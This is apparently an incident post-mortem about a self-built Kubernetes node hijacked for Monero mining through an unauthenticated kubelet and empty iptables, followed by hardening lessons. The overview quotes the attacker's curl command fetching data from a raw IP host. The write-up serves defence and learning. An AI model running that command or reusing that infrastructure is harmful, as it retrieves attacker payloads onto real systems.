How a Misconfigured Kubelet Led to Crypto Mining on Our Kubernetes Node – Lessons Learned

Incident Overview

During routine operations we discovered that one machine in our self‑built Kubernetes cluster had been compromised and was being used to mine Monero cryptocurrency. The attacker executed a hidden binary and fetched additional data via curl -s http://45.9.148.35/scan_threads.dat.

Immediate Response

We stopped Docker on the affected host and isolated the environment, intending to dump the malicious process for later forensic analysis.

Root‑Cause Investigation

Empty iptables : The node had no firewall rules, leaving all ports open.

Kubelet exposed : The kubelet service was running without proper authentication, allowing anonymous API access.

Misconfiguration : A comment in the kubelet startup file disabled the setting that blocks anonymous access, so the protection never took effect.

Log excerpts and screenshots showed the anomalous activity and the commented‑out configuration line.

Improvement Plan

Enforce host‑level firewall rules that deny all inbound traffic by default and only open required ports after verification.

Avoid assigning public IPs to nodes that do not need external exposure.

Configure services, especially kubelet, to bind only to internal network interfaces instead of 0.0.0.0.

Disable anonymous access to kubelet and other APIs; implement proper authentication and authorization mechanisms.

Standardize operational procedures by using scripted automation rather than manual ad‑hoc changes to production environments.

Conclusion

The breach gave the attacker full control over Docker on the compromised node, highlighting the severe risk of misconfigured Kubernetes components. Strengthening host firewalls, limiting exposure of kubelet APIs, and adopting disciplined operational practices are essential to prevent similar incidents.